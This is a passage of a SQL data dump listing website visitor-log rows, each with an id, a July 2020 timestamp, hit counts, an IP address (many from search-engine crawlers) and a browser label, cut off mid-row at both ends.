(519323,1593710052,1,1,0,0,'213.180.203.16','chrome'),(519324,1593710203,1,1,0,0,'178.154.200.196','chrome'),(519325,1593710808,1,1,0,0,'178.154.200.220','chrome'),(519326,1593710927,1,1,0,0,'8.29.198.25','other'),(519327,1593711081,1,1,0,0,'8.29.198.26','other'),(519328,1593711112,1,1,0,0,'66.249.70.72','chrome'),(519329,1593711207,1,1,0,0,'207.46.13.114','other'),(519330,1593711300,1,1,0,0,'178.154.200.236','chrome'),(519331,1593711312,1,1,0,0,'213.180.203.17','chrome'),(519332,1593711322,1,1,0,0,'178.154.200.222','chrome'),(519333,1593711635,1,1,0,0,'66.249.64.38','chrome'),(519334,1593711685,1,1,0,0,'66.249.70.69','chrome'),(519335,1593711887,1,1,0,0,'213.180.203.95','chrome'),(519336,1593712145,1,1,0,0,'213.180.203.16','chrome'),(519337,1593712771,1,1,0,0,'178.154.200.220','chrome'),(519338,1593713099,1,1,0,0,'178.154.200.222','chrome'),(519339,1593713982,2,1,1,0,'66.249.70.70',''),(519340,1593714380,1,1,0,0,'66.249.70.72','chrome'),(519341,1593714677,8,8,0,0,'185.11.82.228','other'),(519342,1593715122,1,1,0,0,'66.249.64.36','chrome'),(519343,1593715928,1,1,0,0,'178.154.200.222','chrome'),(519344,1593716283,1,1,0,0,'66.249.70.70','chrome'),(519345,1593716588,1,1,0,0,'5.181.131.145','chrome'),(519346,1593717451,1,1,0,0,'37.73.113.108','chrome'),(519347,1593717500,1,0,1,0,'66.249.64.38',''),(519348,1593717880,1,1,0,0,'66.249.64.33','chrome'),(519349,1593717913,1,1,0,0,'66.249.70.72','chrome'),(519350,1593717963,1,1,0,0,'66.249.70.69','chrome'),(519351,1593719281,1,1,0,0,'91.196.178.77','chrome'),(519352,1593719650,1,1,0,0,'178.154.200.196','chrome'),(519353,1593719833,3,3,0,0,'66.249.70.72','chrome'),(519354,1593720381,1,1,0,0,'178.154.200.92','chrome'),(519355,1593720703,1,1,0,0,'178.154.200.38','chrome'),(519356,1593720861,1,1,0,0,'66.249.64.38','chrome'),(519357,1593720870,1,1,0,0,'66.249.70.70','chrome'),(519358,1593720890,2,2,0,0,'66.249.70.69','chrome'),(519359,1593721362,1,1,0,0,'213.180.203.16','chrome'),(519360,1593721520,1,1,0,0,'157.55.39.58','other'),(519361,1593721613,2,2,0,0,'178.154.200.236','chrome'),(519362,1593721757,1,1,0,0,'8.29.198.25','other'),(519363,1593721916,1,1,0,0,'8.29.198.26','other'),(519364,1593723128,1,1,0,0,'178.154.200.220','chrome'),(519365,1593723134,1,1,0,0,'207.46.13.114','other'),(519366,1593723422,1,1,0,0,'66.249.70.70','chrome'),(519367,1593723772,1,1,0,0,'66.249.70.72','chrome'),(519368,1593724290,1,1,0,0,'157.55.39.166','other'),(519369,1593724391,1,1,0,0,'17.58.99.7','other'),(519370,1593724673,1,1,0,0,'213.180.203.82','chrome'),(519371,1593724913,1,1,0,0,'66.249.70.72','chrome'),(519372,1593725001,1,1,0,0,'213.180.203.71','chrome'),(519373,1593725207,1,1,0,0,'66.249.70.69','chrome'),(519374,1593725220,1,1,0,0,'207.46.13.114','other'),(519375,1593725229,1,1,0,0,'213.180.203.142','chrome'),(519376,1593725373,1,1,0,0,'178.154.200.236','chrome'),(519377,1593725414,1,1,0,0,'178.154.200.92','chrome'),(519378,1593725539,1,1,0,0,'178.154.200.234','chrome'),(519379,1593726108,1,1,0,0,'213.180.203.16','chrome'),(519380,1593726306,1,1,0,0,'66.249.64.33','chrome'),(519381,1593726885,1,1,0,0,'178.154.200.236','chrome'),(519382,1593727186,1,1,0,0,'178.154.200.220','chrome'),(519383,1593727450,1,1,0,0,'213.180.203.95','chrome'),(519384,1593727547,1,1,0,0,'213.180.203.10','chrome'),(519385,1593727666,2,2,0,0,'66.249.70.70','chrome'),(519386,1593728315,1,1,0,0,'178.154.200.196','chrome'),(519387,1593728485,1,1,0,0,'178.154.200.222','other'),(519388,1593728584,2,2,0,0,'213.180.203.16','chrome'),(519389,1593729304,1,1,0,0,'178.154.200.245','chrome'),(519390,1593729510,1,1,0,0,'51.77.52.160','chrome'),(519391,1593729649,1,1,0,0,'207.46.13.114','other'),(519392,1593729838,1,1,0,0,'178.154.200.220','chrome'),(519393,1593730052,1,1,0,0,'178.154.200.222','chrome'),(519394,1593730572,1,1,0,0,'88.155.162.227','chrome'),(519395,1593730679,1,1,0,0,'178.154.200.236','chrome'),(519396,1593730701,1,1,0,0,'66.249.64.38','chrome'),(519397,1593730710,1,1,0,0,'66.249.64.36','chrome'),(519398,1593730714,1,1,0,0,'66.249.64.33','chrome'),(519399,1593731029,1,1,0,0,'66.249.70.69','chrome'),(519400,1593731406,1,1,0,0,'66.249.70.72','chrome'),(519401,1593732123,1,1,0,0,'66.249.64.36','chrome'),(519402,1593732589,1,1,0,0,'8.29.198.26','other'),(519403,1593732748,1,1,0,0,'8.29.198.27','other'),(519404,1593733226,1,1,0,0,'157.55.39.58','other'),(519405,1593733638,1,1,0,0,'157.55.39.166','other'),(519406,1593734106,1,1,0,0,'62.205.134.182','other'),(519407,1593734314,1,1,0,0,'207.46.13.114','other'),(519408,1593735442,8,8,0,0,'185.11.82.228','other'),(519409,1593735980,1,1,0,0,'5.181.131.145','chrome'),(519410,1593736193,1,1,0,0,'198.199.71.88','firefox'),(519411,1593736552,1,1,0,0,'45.8.255.198','chrome'),(519412,1593736793,2,2,0,0,'66.249.70.72','chrome'),(519413,1593737042,8,8,0,0,'185.11.82.228','other'),(519414,1593737062,1,1,0,0,'66.249.70.69','chrome'),(519415,1593737920,1,1,0,0,'213.180.203.16','chrome'),(519416,1593738046,1,1,0,0,'207.46.13.114','other'),(519417,1593738189,1,1,0,0,'83.143.86.62','other'),(519418,1593738850,8,8,0,0,'185.11.82.228','other'),(519419,1593739007,1,1,0,0,'213.180.203.16','chrome'),(519420,1593739640,1,1,0,0,'178.154.200.43','chrome'),(519421,1593739941,1,1,0,0,'178.154.200.222','chrome'),(519422,1593740023,1,1,0,0,'66.249.70.70','chrome'),(519423,1593740332,1,1,0,0,'178.154.200.97','chrome'),(519424,1593740927,8,8,0,0,'185.11.82.228','other'),(519425,1593741895,1,1,0,0,'178.154.200.236','chrome'),(519426,1593741933,1,1,0,0,'178.154.200.97','chrome'),(519427,1593741943,1,1,0,0,'66.249.70.69','chrome'),(519428,1593742585,1,1,0,0,'213.180.203.95','other'),(519429,1593742765,1,1,0,0,'157.55.39.58','other'),(519430,1593743080,1,1,0,0,'194.61.24.94','other'),(519431,1593743349,1,1,0,0,'66.249.64.38','chrome'),(519432,1593743361,2,2,0,0,'66.249.70.70','chrome'),(519433,1593743429,2,2,0,0,'8.29.198.27','other'),(519434,1593743486,8,8,0,0,'185.11.82.228','other'),(519435,1593744488,1,1,0,0,'66.249.64.38','chrome'),(519436,1593744701,2,2,0,0,'66.249.70.72','chrome'),(519437,1593744808,3,3,0,0,'66.249.70.70','chrome'),(519438,1593744952,3,3,0,0,'66.249.70.69','chrome'),(519439,1593744985,1,1,0,0,'157.55.39.166','other'),(519440,1593745530,1,1,0,0,'66.249.64.33','chrome'),(519441,1593746004,1,1,0,0,'95.221.54.125','chrome'),(519442,1593746102,1,1,0,0,'66.249.70.72','chrome'),(519443,1593746721,8,8,0,0,'185.11.82.228','other'),(519444,1593746977,1,1,0,0,'66.249.64.33','chrome'),(519445,1593747085,1,1,0,0,'157.55.39.64','other'),(519446,1593747147,1,1,0,0,'178.154.200.97','chrome'),(519447,1593747194,1,1,0,0,'213.180.203.16','chrome'),(519448,1593747904,1,1,0,0,'178.154.200.92','chrome'),(519449,1593747907,1,1,0,0,'213.180.203.95','chrome'),(519450,1593748131,1,1,0,0,'213.180.203.90','chrome'),(519451,1593748167,1,0,1,0,'66.249.70.69',''),(519452,1593748428,1,1,0,0,'178.154.200.222','chrome'),(519453,1593748934,1,1,0,0,'66.249.64.33','chrome'),(519454,1593749076,1,1,0,0,'178.154.200.222','other'),(519455,1593749664,1,1,0,0,'66.249.70.69','chrome'),(519456,1593750977,1,1,0,0,'131.220.6.152','chrome'),(519457,1593751042,1,1,0,0,'213.180.203.16','chrome'),(519458,1593751114,8,8,0,0,'185.11.82.228','other'),(519459,1593751186,1,1,0,0,'66.249.70.70','chrome'),(519460,1593751538,1,1,0,0,'178.154.200.236','chrome'),(519461,1593751922,1,1,0,0,'213.180.203.95','chrome'),(519462,1593751998,1,1,0,0,'62.205.134.182','other'),(519463,1593752131,1,1,0,0,'178.154.200.92','chrome'),(519464,1593752289,1,1,0,0,'178.154.200.222','other'),(519465,1593752730,1,1,0,0,'178.154.200.220','chrome'),(519466,1593753137,1,1,0,0,'178.154.200.191','chrome'),(519467,1593753400,1,1,0,0,'157.55.39.64','other'),(519468,1593753747,1,1,0,0,'157.55.39.58','other'),(519469,1593754259,1,1,0,0,'8.29.198.27','other'),(519470,1593754412,1,1,0,0,'8.29.198.26','other'),(519471,1593754593,1,1,0,0,'91.196.178.77','chrome'),(519472,1593755307,1,1,0,0,'178.154.200.22','chrome'),(519473,1593755368,1,1,0,0,'213.180.203.122','other'),(519474,1593755386,1,1,0,0,'66.249.70.72','chrome'),(519475,1593755395,1,1,0,0,'66.249.70.70','chrome'),(519476,1593756023,1,1,0,0,'138.197.109.81','other'),(519477,1593756107,1,1,0,0,'91.196.178.165','chrome'),(519478,1593756312,1,1,0,0,'66.249.70.69','chrome'),(519479,1593756838,1,0,1,0,'66.249.64.38',''),(519480,1593757429,1,1,0,0,'213.180.203.16','chrome'),(519481,1593757748,1,1,0,0,'178.154.200.222','other'),(519482,1593758212,8,8,0,0,'185.11.82.228','other'),(519483,1593758265,1,1,0,0,'157.55.39.3','other'),(519484,1593758281,1,1,0,0,'37.143.63.162','chrome'),(519485,1593758750,1,1,0,0,'66.249.70.69','chrome'),(519486,1593759258,2,2,0,0,'213.180.203.16','chrome'),(519487,1593759810,1,1,0,0,'66.249.70.72','chrome'),(519488,1593760136,1,1,0,0,'209.17.97.42','other'),(519489,1593760285,2,2,0,0,'213.180.203.16','chrome'),(519490,1593760321,1,1,0,0,'157.55.39.3','other'),(519491,1593760416,1,1,0,0,'91.196.178.165','chrome'),(519492,1593760440,2,2,0,0,'157.55.39.58','other'),(519493,1593761183,1,1,0,0,'66.249.70.72','chrome'),(519494,1593761296,1,1,0,0,'157.55.39.166','other'),(519495,1593761539,8,8,0,0,'185.11.82.228','other'),(519496,1593761628,1,1,0,0,'2.57.23.168','chrome'),(519497,1593762235,2,2,0,0,'213.180.203.16','chrome'),(519498,1593762910,1,1,0,0,'66.249.70.72','chrome'),(519499,1593763231,8,8,0,0,'185.11.82.228','other'),(519500,1593763547,1,1,0,0,'46.211.83.199','other'),(519501,1593764438,1,1,0,0,'37.53.226.237','chrome'),(519502,1593764619,1,1,0,0,'157.55.39.58','other'),(519503,1593765098,2,2,0,0,'8.29.198.27','other'),(519504,1593765328,1,1,0,0,'88.155.117.177','chrome'),(519505,1593765604,8,8,0,0,'185.11.82.228','other'),(519506,1593766728,1,1,0,0,'207.46.13.114','other'),(519507,1593768259,8,8,0,0,'185.11.82.228','other'),(519508,1593768641,1,1,0,0,'17.58.99.7','other'),(519509,1593768690,1,1,0,0,'207.46.13.114','other'),(519510,1593768990,1,1,0,0,'34.204.172.33','chrome'),(519511,1593769755,1,1,0,0,'45.40.166.168','chrome'),(519512,1593769868,1,1,0,0,'157.55.39.64','other'),(519513,1593770834,1,1,0,0,'139.59.19.175','chrome'),(519514,1593770835,1,1,0,0,'104.207.233.143','chrome'),(519515,1593770970,1,1,0,0,'212.1.124.210','chrome'),(519516,1593771068,1,1,0,0,'66.249.70.72','chrome'),(519517,1593771829,1,1,0,0,'207.46.13.114','other'),(519518,1593771886,8,8,0,0,'185.11.82.228','other'),(519519,1593771906,1,1,0,0,'212.1.124.210','chrome'),(519520,1593772214,2,2,0,0,'144.217.183.134','chrome'),(519521,1593772384,3,3,0,0,'51.68.11.223','chrome'),(519522,1593772490,3,3,0,0,'157.55.39.58','other'),(519523,1593772653,1,1,0,0,'94.247.176.153','chrome'),(519524,1593772676,1,1,0,0,'178.154.200.220','chrome'),(519525,1593773317,1,1,0,0,'213.180.203.16','chrome'),(519526,1593773588,1,1,0,0,'91.196.178.134','chrome'),(519527,1593773726,3,3,0,0,'91.208.99.2','chrome'),(519528,1593773882,1,1,0,0,'178.154.200.119','chrome'),(519529,1593774018,1,1,0,0,'109.74.154.72','chrome'),(519530,1593774319,1,1,0,0,'157.55.39.58','other'),(519531,1593774626,1,1,0,0,'66.249.64.33','chrome'),(519532,1593774630,2,2,0,0,'178.154.200.222','chrome'),(519533,1593774714,1,1,0,0,'178.154.200.97','chrome'),(519534,1593774812,1,1,0,0,'157.55.39.3','other'),(519535,1593775169,1,1,0,0,'207.46.13.114','other'),(519536,1593775324,3,3,0,0,'45.13.244.187','chrome'),(519537,1593775928,2,2,0,0,'8.29.198.25','other'),(519538,1593776086,3,3,0,0,'207.46.13.114','other'),(519539,1593776158,1,1,0,0,'178.154.200.114','chrome'),(519540,1593776241,1,1,0,0,'157.55.39.3','other'),(519541,1593776340,1,1,0,0,'66.249.70.72','chrome'),(519542,1593776465,2,2,0,0,'91.196.178.82','chrome'),(519543,1593776834,1,1,0,0,'66.249.70.70','chrome'),(519544,1593777377,1,1,0,0,'178.154.200.2','chrome'),(519545,1593777457,1,1,0,0,'178.154.200.196','chrome'),(519546,1593777550,8,8,0,0,'185.11.82.228','other'),(519547,1593777720,1,1,0,0,'66.249.70.69','chrome'),(519548,1593777791,1,1,0,0,'91.196.178.187','chrome'),(519549,1593777973,1,1,0,0,'213.180.203.16','chrome'),(519550,1593778704,2,2,0,0,'178.154.200.92','chrome'),(519551,1593778880,2,2,0,0,'51.68.11.231','chrome'),(519552,1593778994,1,1,0,0,'91.196.178.82','chrome'),(519553,1593779040,1,1,0,0,'91.196.177.15','chrome'),(519554,1593779155,1,1,0,0,'178.154.200.220','chrome'),(519555,1593779267,1,1,0,0,'157.55.39.3','other'),(519556,1593779351,1,1,0,0,'66.249.70.70','chrome'),(519557,1593779477,2,2,0,0,'156.67.237.84','chrome'),(519558,1593779485,1,1,0,0,'47.89.29.162','chrome'),(519559,1593779516,1,1,0,0,'209.59.139.148','chrome'),(519560,1593779527,1,1,0,0,'213.180.203.16','chrome'),(519561,1593779722,1,1,0,0,'178.154.200.196','chrome'),(519562,1593779916,1,1,0,0,'66.249.64.36','chrome'),(519563,1593780011,1,1,0,0,'46.21.198.188','chrome'),(519564,1593780243,1,1,0,0,'157.55.39.3','other'),(519565,1593780772,2,2,0,0,'186.202.153.166','chrome'),(519566,1593780895,2,2,0,0,'51.68.11.195','chrome'),(519567,1593780897,1,1,0,0,'94.247.176.153','chrome'),(519568,1593780929,1,1,0,0,'157.55.39.166','other'),(519569,1593781062,2,2,0,0,'82.146.41.21','chrome'),(519570,1593781093,1,1,0,0,'157.55.39.64','other'),(519571,1593781195,1,1,0,0,'62.173.145.191','chrome'),(519572,1593781385,1,1,0,0,'94.179.154.137','chrome'),(519573,1593781402,1,1,0,0,'178.154.200.222','other'),(519574,1593781420,2,2,0,0,'157.55.39.58','other'),(519575,1593782366,1,1,0,0,'157.55.39.3','other'),(519576,1593782367,1,1,0,0,'89.46.105.110','chrome'),(519577,1593782520,1,1,0,0,'103.12.50.215','chrome'),(519578,1593782882,1,1,0,0,'178.154.200.155','other'),(519579,1593783186,1,1,0,0,'178.154.200.112','chrome'),(519580,1593784263,1,1,0,0,'178.154.200.222','chrome'),(519581,1593784389,1,1,0,0,'157.55.39.166','other'),(519582,1593784499,1,1,0,0,'178.154.200.41','chrome'),(519583,1593784618,2,2,0,0,'157.55.39.64','other'),(519584,1593785249,1,1,0,0,'87.236.20.17','chrome'),(519585,1593785336,3,3,0,0,'178.210.68.22','chrome'),(519586,1593785509,1,1,0,0,'5.45.207.162','chrome'),(519587,1593785583,2,2,0,0,'159.69.41.114','chrome'),(519588,1593785719,1,1,0,0,'52.246.163.173','other'),(519589,1593785944,2,2,0,0,'213.180.203.16','chrome'),(519590,1593786298,1,1,0,0,'178.154.200.222','chrome'),(519591,1593786680,1,1,0,0,'66.249.64.33','chrome'),(519592,1593786755,1,1,0,0,'8.29.198.26','other'),(519593,1593786902,1,1,0,0,'8.29.198.27','other'),(519594,1593787144,2,2,0,0,'178.154.200.216','chrome'),(519595,1593787348,2,2,0,0,'178.154.200.196','chrome'),(519596,1593787818,1,1,0,0,'92.63.111.27','other'),(519597,1593788119,8,8,0,0,'185.11.82.228','other'),(519598,1593788375,2,2,0,0,'187.45.240.34','chrome'),(519599,1593788581,1,1,0,0,'51.68.11.203','chrome'),(519600,1593788701,1,1,0,0,'178.154.200.220','chrome'),(519601,1593788806,1,1,0,0,'157.55.39.64','other'),(519602,1593788814,1,1,0,0,'207.46.13.114','other'),(519603,1593788935,1,1,0,0,'195.128.120.143','chrome'),(519604,1593789008,3,3,0,0,'213.180.203.16','chrome'),(519605,1593789067,1,1,0,0,'157.55.39.58','other'),(519606,1593789231,1,1,0,0,'213.180.203.16','other'),(519607,1593789957,1,1,0,0,'195.74.38.173','chrome'),(519608,1593789984,1,1,0,0,'93.188.2.5','chrome'),(519609,1593790434,1,1,0,0,'35.214.186.227','chrome'),(519610,1593790924,1,1,0,0,'188.191.233.57','chrome'),(519611,1593791072,1,1,0,0,'88.198.177.113','chrome'),(519612,1593791326,1,1,0,0,'188.166.218.146','chrome'),(519613,1593791380,1,1,0,0,'157.55.39.64','other'),(519614,1593791482,2,2,0,0,'51.68.11.227','chrome'),(519615,1593791716,1,1,0,0,'213.180.203.17','other'),(519616,1593792934,2,2,0,0,'91.208.99.2','chrome'),(519617,1593793212,1,1,0,0,'213.180.203.17','chrome'),(519618,1593793537,1,1,0,0,'46.21.198.188','chrome'),(519619,1593793704,1,1,0,0,'207.46.13.114','other'),(519620,1593794032,2,2,0,0,'193.202.110.21','chrome'),(519621,1593794444,2,2,0,0,'198.46.81.54','chrome'),(519622,1593794592,1,1,0,0,'213.180.203.122','other'),(519623,1593795341,1,1,0,0,'178.154.200.196','chrome'),(519624,1593795345,1,1,0,0,'178.154.200.97','chrome'),(519625,1593795580,1,1,0,0,'5.248.164.76','chrome'),(519626,1593795588,1,0,1,0,'66.249.70.72',''),(519627,1593795749,2,2,0,0,'51.68.11.203','chrome'),(519628,1593795819,1,1,0,0,'213.180.203.16','chrome'),(519629,1593795863,1,1,0,0,'148.66.146.25','chrome'),(519630,1593795915,1,1,0,0,'163.172.13.164','chrome'),(519631,1593796002,3,3,0,0,'91.208.99.2','chrome'),(519632,1593796186,1,1,0,0,'51.89.155.5','chrome'),(519633,1593796206,1,1,0,0,'178.154.200.222','chrome'),(519634,1593796466,1,1,0,0,'66.249.70.70','chrome'),(519635,1593797091,1,1,0,0,'157.55.39.58','other'),(519636,1593797287,1,1,0,0,'50.62.161.240','chrome'),(519637,1593797316,1,1,0,0,'213.180.203.122','chrome'),(519638,1593797400,2,2,0,0,'91.208.99.2','chrome'),(519639,1593797580,1,1,0,0,'8.29.198.27','other'),(519640,1593797732,1,1,0,0,'8.29.198.26','other'),(519641,1593797798,16,16,0,0,'192.99.7.128','other'),(519642,1593797906,1,1,0,0,'77.74.177.114','chrome'),(519643,1593798540,1,1,0,0,'178.154.200.222','chrome'),(519644,1593798564,1,1,0,0,'178.154.200.220','chrome'),(519645,1593798913,3,3,0,0,'45.248.68.69','chrome'),(519646,1593800277,1,1,0,0,'149.202.196.101','chrome'),(519647,1593800376,1,1,0,0,'35.208.193.163','chrome'),(519648,1593801592,1,1,0,0,'213.180.203.16','chrome'),(519649,1593801704,1,1,0,0,'178.154.200.220','chrome'),(519650,1593801913,1,1,0,0,'66.249.70.69','chrome'),(519651,1593802090,1,1,0,0,'178.154.200.196','chrome'),(519652,1593802107,1,1,0,0,'178.154.200.97','chrome'),(519653,1593802175,1,1,0,0,'5.45.37.157','chrome'),(519654,1593802938,2,2,0,0,'66.249.64.36','chrome'),(519655,1593802979,1,1,0,0,'66.249.70.72','chrome'),(519656,1593803001,1,1,0,0,'157.55.39.245','other'),(519657,1593803574,1,1,0,0,'213.180.203.16','chrome'),(519658,1593803621,1,1,0,0,'5.255.253.82','chrome'),(519659,1593803763,1,1,0,0,'178.154.200.191','chrome'),(519660,1593804157,1,1,0,0,'154.51.131.142','chrome'),(519661,1593804169,1,1,0,0,'193.106.30.99','firefox'),(519662,1593804282,1,1,0,0,'157.55.39.245','other'),(519663,1593804384,1,1,0,0,'213.180.203.95','chrome'),(519664,1593804524,1,1,0,0,'178.154.200.222','chrome'),(519665,1593805699,1,1,0,0,'178.154.200.196','chrome'),(519666,1593806278,2,2,0,0,'157.55.39.245','other'),(519667,1593806295,1,1,0,0,'157.55.39.166','other'),(519668,1593806556,1,1,0,0,'213.180.203.16','chrome'),(519669,1593806902,1,1,0,0,'77.245.149.11','chrome'),(519670,1593807015,2,2,0,0,'157.7.44.144','chrome'),(519671,1593807034,1,1,0,0,'178.154.200.196','chrome'),(519672,1593807421,1,1,0,0,'178.154.200.222','other'),(519673,1593808007,1,1,0,0,'178.154.200.196','chrome'),(519674,1593808029,8,8,0,0,'185.11.82.228','other'),(519675,1593808407,1,1,0,0,'8.29.198.27','other'),(519676,1593808428,2,2,0,0,'154.90.68.54','chrome'),(519677,1593808502,1,1,0,0,'104.207.233.143','chrome'),(519678,1593808569,1,1,0,0,'8.29.198.26','other'),(519679,1593808769,1,1,0,0,'213.180.203.16','chrome'),(519680,1593809023,1,1,0,0,'5.255.253.82','other'),(519681,1593809379,1,1,0,0,'178.154.200.92','chrome'),(519682,1593809539,8,8,0,0,'185.11.82.228','other'),(519683,1593809902,2,2,0,0,'51.68.11.227','chrome'),(519684,1593809937,1,1,0,0,'89.46.105.110','chrome'),(519685,1593810630,2,2,0,0,'157.55.39.245','other'),(519686,1593810632,1,1,0,0,'213.180.203.16','chrome'),(519687,1593811236,8,8,0,0,'185.11.82.228','other'),(519688,1593811286,1,1,0,0,'132.148.29.143','chrome'),(519689,1593811604,1,1,0,0,'66.147.238.141','chrome'),(519690,1593811715,1,1,0,0,'178.154.200.222','chrome'),(519691,1593811946,1,1,0,0,'5.255.253.82','other'),(519692,1593812059,2,2,0,0,'213.180.203.16','chrome'),(519693,1593812098,1,1,0,0,'178.154.200.97','chrome'),(519694,1593812429,2,2,0,0,'157.55.39.58','other'),(519695,1593812882,1,1,0,0,'81.88.49.34','chrome'),(519696,1593812898,1,1,0,0,'81.88.49.6','chrome'),(519697,1593812914,1,1,0,0,'89.46.107.92','chrome'),(519698,1593812939,1,1,0,0,'178.154.200.222','chrome'),(519699,1593812985,1,1,0,0,'213.180.203.16','chrome'),(519700,1593813400,8,8,0,0,'185.11.82.228','other'),(519701,1593814124,1,1,0,0,'66.249.70.70','chrome'),(519702,1593814402,2,2,0,0,'91.208.99.2','chrome'),(519703,1593814443,1,1,0,0,'87.236.20.169','chrome'),(519704,1593814723,1,1,0,0,'178.154.200.220','chrome'),(519705,1593815048,1,1,0,0,'178.154.200.97','chrome'),(519706,1593815136,1,1,0,0,'178.154.200.222','chrome'),(519707,1593815474,3,3,0,0,'192.169.197.207','chrome'),(519708,1593815522,1,1,0,0,'213.180.203.16','chrome'),(519709,1593815635,1,1,0,0,'178.154.200.196','other'),(519710,1593815763,1,1,0,0,'139.59.19.175','chrome'),(519711,1593815814,1,1,0,0,'213.180.203.16','other'),(519712,1593816064,1,1,0,0,'157.55.39.166','other'),(519713,1593816114,8,8,0,0,'185.11.82.228','other'),(519714,1593816310,1,1,0,0,'157.55.39.64','other'),(519715,1593816361,1,1,0,0,'198.49.79.226','chrome'),(519716,1593816501,2,2,0,0,'213.180.203.16','chrome'),(519717,1593816539,1,1,0,0,'193.58.104.175','chrome'),(519718,1593816685,2,2,0,0,'178.154.200.222','chrome'),(519719,1593816911,1,1,0,0,'5.45.207.162','chrome'),(519720,1593817265,2,2,0,0,'51.68.11.227','chrome'),(519721,1593817395,2,2,0,0,'51.68.11.195','chrome'),(519722,1593817494,1,1,0,0,'66.249.70.69','chrome'),(519723,1593818249,1,1,0,0,'178.154.200.97','chrome'),(519724,1593818445,1,1,0,0,'178.154.200.222','chrome'),(519725,1593818931,1,1,0,0,'37.143.62.121','chrome'),(519726,1593819234,1,1,0,0,'8.29.198.25','other'),(519727,1593819404,1,1,0,0,'8.29.198.27','other'),(519728,1593819553,1,1,0,0,'178.154.200.97','chrome'),(519729,1593819697,8,8,0,0,'185.11.82.228','other'),(519730,1593820318,1,1,0,0,'178.154.200.196','other'),(519731,1593820432,1,1,0,0,'66.249.70.72','chrome'),(519732,1593820570,1,1,0,0,'62.205.134.182','other'),(519733,1593820637,1,1,0,0,'194.61.24.94','other'),(519734,1593821201,1,1,0,0,'178.154.200.97','chrome'),(519735,1593821482,1,1,0,0,'102.130.112.235','chrome'),(519736,1593821568,2,2,0,0,'174.138.51.109','chrome'),(519737,1593822039,1,1,0,0,'178.154.200.196','chrome'),(519738,1593822502,2,2,0,0,'213.180.203.16','chrome'),(519739,1593822615,1,1,0,0,'157.55.39.64','other'),(519740,1593822622,1,1,0,0,'213.180.203.16','other'),(519741,1593823128,2,2,0,0,'46.37.171.183','chrome'),(519742,1593823203,1,1,0,0,'66.249.64.33','chrome'),(519743,1593823387,1,1,0,0,'5.45.207.162','chrome'),(519744,1593823558,3,3,0,0,'88.99.2.203','other'),(519746,1593823610,1,1,0,0,'66.249.70.70','chrome'),(519747,1593824759,3,3,0,0,'45.32.106.150','chrome'),(519748,1593824791,1,1,0,0,'51.91.15.103','chrome'),(519749,1593824853,1,1,0,0,'108.175.9.28','chrome'),(519750,1593824998,8,8,0,0,'185.11.82.228','other'),(519751,1593825769,1,1,0,0,'207.46.13.114','other'),(519752,1593825910,1,1,0,0,'66.249.70.72','chrome'),(519753,1593826076,2,2,0,0,'47.52.43.140','chrome'),(519754,1593826094,1,1,0,0,'193.106.248.114','chrome'),(519755,1593826314,1,1,0,0,'154.81.86.238','chrome'),(519756,1593826377,2,2,0,0,'51.15.72.153','chrome'),(519757,1593826392,3,3,0,0,'87.236.20.169','chrome'),(519758,1593826487,1,1,0,0,'54.191.98.77','chrome'),(519759,1593826498,1,1,0,0,'85.25.237.25','chrome'),(519760,1593827187,1,1,0,0,'66.249.70.70','chrome'),(519761,1593827214,1,1,0,0,'207.46.13.114','other'),(519762,1593827226,3,3,0,0,'157.55.39.245','other'),(519763,1593827890,3,3,0,0,'192.185.81.183','chrome'),(519764,1593827926,1,1,0,0,'69.163.201.46','chrome'),(519765,1593828079,1,1,0,0,'157.55.39.64','other'),(519766,1593828359,1,1,0,0,'157.55.39.58','other'),(519767,1593828990,1,1,0,0,'89.46.105.154','chrome'),(519768,1593829081,2,2,0,0,'154.90.68.54','chrome'),(519769,1593829621,1,1,0,0,'178.154.200.220','other'),(519770,1593830067,1,1,0,0,'8.29.198.27','other'),(519771,1593830157,1,1,0,0,'157.55.39.166','other'),(519772,1593830233,1,1,0,0,'8.29.198.25','other'),(519773,1593830343,1,1,0,0,'89.46.105.246','chrome'),(519774,1593830455,1,1,0,0,'185.224.138.62','chrome'),(519775,1593830535,1,1,0,0,'157.55.39.64','other'),(519776,1593830648,2,2,0,0,'109.70.3.170','chrome'),(519777,1593831922,1,1,0,0,'149.202.196.101','chrome'),(519778,1593831953,1,1,0,0,'66.249.70.69','chrome'),(519779,1593832006,2,2,0,0,'51.68.11.227','chrome'),(519780,1593832196,1,1,0,0,'154.81.86.238','chrome'),(519781,1593833217,1,1,0,0,'157.55.39.166','other'),(519782,1593833452,1,1,0,0,'89.46.104.172','chrome'),(519783,1593834802,1,1,0,0,'89.46.105.248','chrome'),(519784,1593834881,1,1,0,0,'94.153.9.60','chrome'),(519785,1593835045,2,2,0,0,'91.208.99.2','chrome'),(519786,1593835141,1,1,0,0,'144.217.183.134','chrome'),(519787,1593835905,8,8,0,0,'185.11.82.228','other'),(519788,1593835937,1,0,1,0,'66.249.64.36',''),(519789,1593837105,1,1,0,0,'131.220.6.152','chrome'),(519790,1593837107,1,1,0,0,'66.249.64.33','chrome'),(519791,1593837591,2,2,0,0,'109.70.3.170','chrome'),(519792,1593837682,1,1,0,0,'157.55.39.64','other'),(519793,1593837901,2,2,0,0,'89.46.105.252','chrome'),(519794,1593837936,1,1,0,0,'5.2.91.48','chrome'),(519795,1593838003,1,1,0,0,'89.46.105.169','chrome'),(519796,1593838008,2,2,0,0,'47.89.29.162','chrome'),(519797,1593838167,1,1,0,0,'62.205.134.182','other'),(519798,1593838191,1,1,0,0,'193.106.30.99','firefox'),(519799,1593838692,1,1,0,0,'207.46.13.114','other'),(519800,1593839059,1,1,0,0,'80.85.156.55','chrome'),(519801,1593839073,1,1,0,0,'66.249.64.38','chrome'),(519802,1593839099,1,1,0,0,'157.55.39.166','other'),(519803,1593839167,1,1,0,0,'185.98.131.129','chrome'),(519804,1593839941,1,1,0,0,'88.155.153.103','chrome'),(519805,1593840265,1,1,0,0,'66.249.70.72','chrome'),(519806,1593840327,1,1,0,0,'66.249.70.69','chrome'),(519807,1593840346,1,1,0,0,'91.196.178.89','chrome'),(519808,1593840833,1,1,0,0,'144.217.158.133','chrome'),(519809,1593840897,2,2,0,0,'8.29.198.25','other'),(519810,1593840949,2,2,0,0,'91.208.99.2','chrome'),(519811,1593841418,1,1,0,0,'51.68.11.231','chrome'),(519812,1593841823,1,1,0,0,'46.211.74.17','chrome'),(519813,1593843115,1,1,0,0,'157.55.39.58','other'),(519814,1593843674,1,1,0,0,'66.249.70.72','chrome'),(519815,1593844197,1,1,0,0,'66.249.70.70','chrome'),(519816,1593844249,1,1,0,0,'46.211.74.17','chrome'),(519817,1593844681,1,1,0,0,'66.249.70.69','c